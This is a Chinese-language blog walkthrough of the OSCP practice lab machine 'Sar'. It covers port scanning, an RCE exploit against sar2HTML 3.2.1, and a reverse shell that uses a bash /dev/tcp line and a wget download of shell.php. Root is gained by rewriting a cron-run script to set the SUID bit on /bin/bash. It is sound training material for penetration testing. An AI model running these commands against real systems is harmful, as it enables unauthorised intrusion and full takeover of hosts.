freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

OSCP PG—Sar
W_mingle 2023-08-22 17:06:19 88129

0x01 前言

好久没有更新了,最近公司来项目了也就没进行更新。今天闲下来就继续更新文章了。今天的靶机是Sar机器,难度不大。废话不多说,直接开搞。

0x02 过程

信息收集

先用masscan+nmap来一波端口信息收集

masscan -p 0-65535  192.168.190.35 --rate=10000 -e tun0 

扫描到开放端口22和80端口

用nmap对端口信息进行详细收集

nmap -sV -sS -p 22,80 192.168.190.35

1692692716_64e470ec2ac1d43b9f41e.png!small?1692692716014

访问web站点发现robots.txt文件,里面还记录了一个隐藏目录

1692692796_64e4713cca2a6daaada22.png!small?1692692796614

进入sar2HTML目录,得到了后台版本信息

1692692950_64e471d639d63271aba5f.png!small?1692692950302

用searchsploit搜索历史漏洞

searchsploit sar2html 3.2.1

发现存在RCE漏洞

1692692988_64e471fc9a36c1e728e25.png!small?1692692988399

获取利用脚本,进行利用

Getshell

得到exp文件,进行利用,成功执行系统命令

1692693094_64e47266c6c13e55c741f.png!small?1692693094849

在获取反弹shell的时候

bash -c 'bash -i >& /dev/tcp/kali-ip/port 0>&1'

反弹不了shell,用echo写入文件也不行,然后想到让目标主机下载反弹shell脚本文件

先确定目录,以及是否能用wget

1692693344_64e473606647046e4a5ab.png!small?1692693344342

确定了能使用wget,然后对kali上的脚本文件进行下载

shell脚本

1692693485_64e473ed88c9b2bd85e04.png!small?1692693485355

用python3在当前目录下开启一个简易http服务

python3 -m http.server 80

临时shell上执行(默认访问80端口使用http服务,如果是其它端口记得加上http://以及端口号)

wget 192.168.45.178/shell.php

1692693795_64e475232cdaacaebb5a9.png!small?1692693795148

成功接收到请求

1692693778_64e47512702f1f7ea12e9.png!small?1692693778315

用nc监听4444端口,接收反弹回来的shell

1692693879_64e47577e3a5db7bafd72.png!small?1692693879793

成功拿到shell

提权

调用python的shell,防止有一些命令不能用

python3 -c 'import pty;pty.spawn("/bin/bash")'

在home下存在一个love用户的家目录

1692694145_64e4768143fa5c546d7dc.png!small?1692694145085

但是里面没有能利用的文件

通过查找suid、sudo list都没有提权点。

当时想的是应该需要切换到love用户,再提权到root,就去找登录凭证。想到web站点应该有数据库配置文件。

在切换到/var/www/html目录时发现有两个可能存在提权的文件

1692694406_64e47786dd126a3a027af.png!small?1692694406785

文件内容为

finally.sh

1692694458_64e477ba7cacbd161639e.png!small?1692694458279

write.sh

1692694494_64e477dea60cff72fb20f.png!small?1692694494408

看起来像是计划任务,查询计划任务列表

cat /etc/crontab

确实存在该计划任务,并且每5分钟执行一次

1692694592_64e478400373e531f6d6f.png!small?1692694591860

这下我们就可以修改write.sh文件来进行提权

echo "bash -c 'chmod u+s /bin/bash'" > write.sh

成功修改文件

1692694749_64e478ddd98ee4b09253e.png!small?1692694749825

现在就等计划任务执行,将bash带上suid权限

1692694854_64e479465645b54c0824a.png!small?1692694854111

利用bash提权

1692694924_64e4798ca0a20495d499d.png!small?1692694924506

0x03 总结

这个靶机整体难度不大,但是在提权的时候也让我意识到,一定要先把suid、sudo list和计划任务这三个点看了,这样可以节省很多时间。

# 渗透测试 # 网络安全
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 W_mingle 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
W_mingle LV.3
菜狗一个
  • 6 文章数
  • 4 关注者
OSCP PG—Pwned1
2023-08-23
OSCP PG—Amaterasu
2023-07-10
OSCP PG—Potato
2023-07-09
文章目录